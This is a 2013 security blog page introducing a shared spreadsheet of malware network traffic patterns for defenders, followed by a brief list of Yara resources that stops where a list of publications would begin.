Traffic analysis has long been a primary method of malware identification, and the thousands of IDS signatures developed for it are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features without access to a well-designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, compiled from open sources. We decided others might find it useful too.


This list is not meant to be the only way to identify malware families; it is an aid and a reference. We will be adding data from our own research and from online publications (hint: please send us links to add).

The References column is a good source of links to malware analyses and resources for the different families. The second tab, "EZ Lookup", offers a more condensed view that allows easier sorting. The Links tab gives a resource list, and the TBD tab shows entries for malware for which we have no common or public name. The list covers all types of malware: cybercrime, APT and hacktivism.

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS" SPREADSHEET 


To download (you might miss updates if you decide to use a static copy), click on File - Download As in the spreadsheet view. To sort any columns, click on View - List. Your sorting will not affect other visitors.  


If you think you can and wish to contribute, or have any comments or corrections please email Andre' or Mila

Monday, February 25, 2013

Yara Resources

Yara Project by Víctor Manuel Álvarez

Yara Exchange Google Group - exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb.2013

Notable Yara related publications by date: